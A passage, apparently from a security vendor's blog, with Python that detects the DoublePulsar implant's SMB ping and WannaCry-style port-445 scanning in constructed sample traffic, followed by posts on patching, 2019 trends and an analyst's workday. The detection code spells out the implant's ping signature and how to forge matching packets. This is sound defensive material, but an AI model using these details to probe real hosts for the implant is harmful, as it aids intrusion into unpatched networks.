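SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION2 = 0x32
SMB_FLAGS_REPLY = 0x80
TRANS2_SESSION_SETUP = 0x000E   # Trans2 subcommand the ping abuses
DOUBLEPULSAR_PING_MID = 0x41    # Multiplex ID the scanner sets in the ping
DOUBLEPULSAR_ALIVE_MID = 0x51   # Multiplex ID an implanted host echoes back


def parse_smb1(msg):
    """Parse the SMB1 header and, for Trans2 requests, the subcommand.

    msg is one SMB message with the NetBIOS session header removed (assumption).
    Returns None if the bytes are not SMB1.
    """
    if len(msg) < 32 or msg[:4] != SMB_MAGIC:
        return None
    command = msg[4]
    flags = msg[9]
    mid = struct.unpack_from("<H", msg, 30)[0]
    subcommand = None
    if command == SMB_COM_TRANSACTION2 and not flags & SMB_FLAGS_REPLY and len(msg) >= 63:
        word_count = msg[32]      # number of 16-bit parameter words (15 for Trans2)
        setup_count = msg[59]     # SetupCount: 26 bytes into the word block
        if word_count >= 15 and setup_count >= 1:
            subcommand = struct.unpack_from("<H", msg, 61)[0]   # Setup[0]
    return {"command": command, "reply": bool(flags & SMB_FLAGS_REPLY),
            "mid": mid, "subcommand": subcommand}


def detect_doublepulsar(messages):
    """Walk (src, dst, smb_bytes) tuples and return (src, dst, finding) hits.

    'doublepulsar_ping': src is probing dst for the implant.
    'doublepulsar_present': src (the replying host) carries the implant.
    """
    findings = []
    for src, dst, payload in messages:
        p = parse_smb1(payload)
        if p is None or p["command"] != SMB_COM_TRANSACTION2:
            continue
        if (not p["reply"] and p["subcommand"] == TRANS2_SESSION_SETUP
                and p["mid"] == DOUBLEPULSAR_PING_MID):
            findings.append((src, dst, "doublepulsar_ping"))
        elif p["reply"] and p["mid"] == DOUBLEPULSAR_ALIVE_MID:
            findings.append((src, dst, "doublepulsar_present"))
    return findings


# --- constructed sample traffic (not a real capture) ------------------------

def _smb1_header(command, mid, reply=False):
    flags = SMB_FLAGS_REPLY if reply else 0x18
    return struct.pack("<4sBIBHH8sHHHHH", SMB_MAGIC, command, 0, flags, 0xC807,
                       0, b"\x00" * 8, 0, 0, 0xFEFF, 0, mid)


def _trans2_request(mid, subcommand):
    # The 15 parameter words of SMB_COM_TRANSACTION2 with SetupCount = 1,
    # followed by ByteCount and 12 bytes of (dummy) parameters.
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, 0, 0,
                        12, 66, 0, 0, 1, 0, subcommand)
    return (_smb1_header(SMB_COM_TRANSACTION2, mid) + bytes([len(words) // 2])
            + words + struct.pack("<H", 12) + b"\x00" * 12)


def _trans2_reply(mid):
    # Minimal reply: WordCount 0, ByteCount 0.
    return _smb1_header(SMB_COM_TRANSACTION2, mid, reply=True) + b"\x00\x00\x00"


SAMPLE_TRAFFIC = [
    ("10.0.0.5", "10.0.0.20", _trans2_request(DOUBLEPULSAR_PING_MID, TRANS2_SESSION_SETUP)),
    ("10.0.0.20", "10.0.0.5", _trans2_reply(DOUBLEPULSAR_ALIVE_MID)),   # implanted host
    ("10.0.0.7", "10.0.0.3", _trans2_request(0x0002, 0x0001)),           # benign FIND_FIRST2
    ("10.0.0.5", "10.0.0.21", _trans2_request(DOUBLEPULSAR_PING_MID, TRANS2_SESSION_SETUP)),
    ("10.0.0.21", "10.0.0.5", _trans2_reply(DOUBLEPULSAR_PING_MID)),    # clean host echoes 0x41
]

if __name__ == "__main__":
    for hit in detect_doublepulsar(SAMPLE_TRAFFIC):
        print(hit)
```

A clean Windows host answers the ping with STATUS_NOT_IMPLEMENTED and echoes Multiplex ID 0x41, which is why only the 0x51 reply is treated as confirmation; the ping itself is worth alerting on regardless, because it means the sender is running MS17-010 scanning logic.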

– Exploited devices were then observed scanning both internally and externally on port 445:

Figure 4 – Graph showing a spike in external connections and associated model breaches
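The spike in Figure 4 is a fan-out pattern: one source opening port 445 connections to many distinct hosts in a short window, some of them outside the organisation. The following added example (not code from the original post or from the monitoring platform it describes) runs that check over connection records of the form (timestamp, source, destination, destination port), keeping a per-source sliding window and splitting the targets into internal and external using RFC 1918 ranges; the sample records are constructed, the 60-second window and 20-host threshold are assumptions to tune per environment, and the external addresses come from the 203.0.113.0/24 documentation range.

```python
import ipaddress
from collections import defaultdict

# Assumption: the organisation's internal address space is the RFC 1918 ranges.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """True when ip falls inside one of the internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in PRIVATE_NETS)


def smb_fanout(records, window=60, threshold=20):
    """Flag sources that reach >= threshold distinct hosts on TCP/445 within
    `window` seconds.

    records: iterable of (ts, src, dst, dport); ts in seconds.
    Returns {src: {"first_seen": ts, "internal": n, "external": n}} where the
    counts reflect the latest window in which the threshold was met.
    """
    alerts = {}
    recent = defaultdict(list)          # src -> [(ts, dst), ...] inside the window
    for ts, src, dst, dport in sorted(records):
        if dport != 445:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:     # expire old connections
            q.pop(0)
        targets = {d for _, d in q}
        if len(targets) >= threshold:
            a = alerts.setdefault(src, {"first_seen": ts, "internal": 0, "external": 0})
            a["internal"] = sum(is_internal(d) for d in targets)
            a["external"] = len(targets) - a["internal"]
    return alerts


# Constructed connection log (ts, src, dst, dport): 10.0.0.20 sweeps 15 internal
# hosts and then 8 external ones within 23 seconds; 10.0.0.7 is ordinary traffic.
SAMPLE_CONNS = (
    [(t, "10.0.0.20", f"10.0.0.{100 + t}", 445) for t in range(15)]
    + [(15 + i, "10.0.0.20", f"203.0.113.{10 + i}", 445) for i in range(8)]
    + [(3, "10.0.0.7", "10.0.0.50", 445), (9, "10.0.0.7", "10.0.0.51", 445),
       (40, "10.0.0.7", "10.0.0.50", 445), (41, "10.0.0.7", "10.0.0.60", 80)]
)

if __name__ == "__main__":
    for src, info in smb_fanout(SAMPLE_CONNS).items():
        print(f"{src}: first_seen={info['first_seen']}s "
              f"internal={info['internal']} external={info['external']}")
```

Any non-zero external count from a workstation is the stronger signal here: internal SMB fan-out has benign explanations (vulnerability scanners, backup agents), but a user endpoint opening port 445 to arbitrary Internet addresses is characteristic of WannaCry's random-address propagation thread.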

Quick takeaways

The WannaCry attacks reaffirm the importance of patching: the SMBv1 vulnerability that EternalBlue exploits was addressed by Microsoft in MS17-010, almost two months before the attack. The unrelenting infections and damage caused demonstrate that many organisations are still unpatched and at risk. Patch management remains a key component of an effective security posture, as does the ability to recover lost files should the business be hit by ransomware.

2018 was the year of large-scale data breaches as visualised in the Cyberseer Infographic: 2018 Breach Highlights.

So, what can we expect to see in the cyber security space in the coming year? 2019 is certain to bring new attack techniques. As you think about how to protect your organisation, here is an infographic of the cyber security trends and expectations we believe are in store for 2019 and beyond.

Infographic: 2019 Cyber Security Trends and Expectations

In summary, in 2019 we can expect to see the following cyber security trends and expectations:

A day in the life a Cyber Security Analyst

Regardless of the specific role of a professional working in cyber security, the day ahead is unlikely to follow a generic 9 to 5 pattern. The unpredictable nature of the ever-evolving threat landscape means everything is quiet until it is not.

Even before arriving at the office, the morning commute usually consists of reading the latest news, blogs and write-ups of newly discovered threats, each potentially providing insight into new techniques that need to be defended against.

Once seated and logged in, the first task is to review and triage the potential threats generated overnight for those clients who have not opted into a 24x7 service. Aided by machine learning tools, the noise and false positives commonly seen with traditional tools are largely gone, and the cyber security analyst is presented with meaningful output.

Depending on the outcome of the triage process, each alert is either dismissed as benign or written up as an incident report and escalated to the affected party. Once the client acknowledges receipt of the report, the analyst works in liaison with their team to diagnose the infection and ensure successful containment.

Throughout the day the cyber security analyst continues to monitor newly generated threats and follows the escalation process where needed. If a threat is escalated, the analyst is required to aid the further investigation to determine how the threat was delivered to the network; this also gives the analyst an opportunity to advise the client on remediation.

Analysts also edit rulesets and prioritise devices in order to quickly identify further anomalous activity. Doing so helps the analyst keep an eye on affected devices and ensure there is no indication of further activity. The cyber security analyst is involved in the whole process from start to finish.

Whilst generated alerts are a passive method of analysis, another aspect of a cyber security analyst's day is proactive threat hunting: the active pursuit of anomalies on servers, endpoints and network traffic that may be a sign of compromise.

Understanding a client's unique set of risks and requirements ensures that an analyst can prioritise where to focus their threat hunting. This combination of prioritised risk, threat intelligence and a good understanding of adversaries' Tactics, Techniques and Procedures (TTPs) means an analyst can slice datasets and reveal insights with the least possible effort.

As the day moves on, downtime allows the cyber security analyst to step back from client systems and spend time experimenting, analysing malware samples and testing new tools that can be integrated into their workflow to further improve day-to-day activities.

If you are interested in learning more about our cyber security analysts operating our managed security service, please reach out to our team of experts at [email protected]